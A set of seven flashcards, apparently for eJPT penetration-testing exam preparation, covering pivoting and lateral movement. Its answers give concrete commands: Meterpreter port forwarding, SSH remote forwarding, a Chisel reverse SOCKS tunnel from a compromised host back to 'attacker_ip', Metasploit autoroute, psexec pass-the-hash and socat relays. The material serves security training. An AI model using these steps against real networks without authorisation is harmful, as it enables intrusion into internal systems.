Pivoting and Lateral Movement Flashcards
7 cards from real EJPT practice questions. Tap to flip, then mark Knew It or Still Learning — missed cards come back until you master them.
Read the first 7 Pivoting and Lateral Movement flashcards as text
Which Meterpreter command is used to perform local port forwarding — for example, forwarding local port 3389 to an internal RDP service at 192.168.1.50:3389?
Answer: portfwd add -l 3389 -r 192.168.1.50 -p 3389
The Meterpreter `portfwd add` command creates a local port forward from the attacker's port to an internal host and port through the compromised session.
When using SSH remote port forwarding with '-R 8080:localhost:80', which machine listens on port 8080?
Answer: The remote SSH server
With SSH -R (remote forwarding), the remote server opens the specified port and forwards incoming connections back to the local machine's specified address and port.
A pentester uses Chisel for pivoting. After running 'chisel server -p 8000 --reverse' on the attacker machine, what command is run on the compromised host to create a reverse SOCKS proxy?
Answer: chisel client attacker_ip:8000 R:socks
In Chisel's reverse tunnel mode, the client on the compromised host connects back to the server and the R:socks argument creates a reverse SOCKS5 proxy.
What is the purpose of the Metasploit post module 'post/multi/manage/autoroute'?
Answer: Automatically add routes for subnets reachable by a compromised session
The autoroute post module automatically identifies and adds Metasploit routes for all subnets accessible through a given session.
A pentester needs to forward traffic to an internal Windows host's SMB port (445) through a pivot. After configuring the route in Metasploit, which module could they use to perform pass-the-hash against the internal target?
Answer: exploit/windows/smb/psexec
The psexec module supports pass-the-hash authentication and can be routed through an existing pivot to attack internal SMB targets.
Which command lists active port forwards in a Meterpreter session?
Answer: portfwd list
The `portfwd list` command in Meterpreter displays all currently configured local port forwarding rules for that session.
After compromising a Linux pivot host, a pentester uses socat to forward connections. Which socat command forwards TCP port 4444 on the pivot to 192.168.1.100:4444?
Answer: socat TCP-LISTEN:4444,fork TCP:192.168.1.100:4444
Socat's TCP-LISTEN with fork creates a listening socket that relays each accepted connection to the specified remote address and port.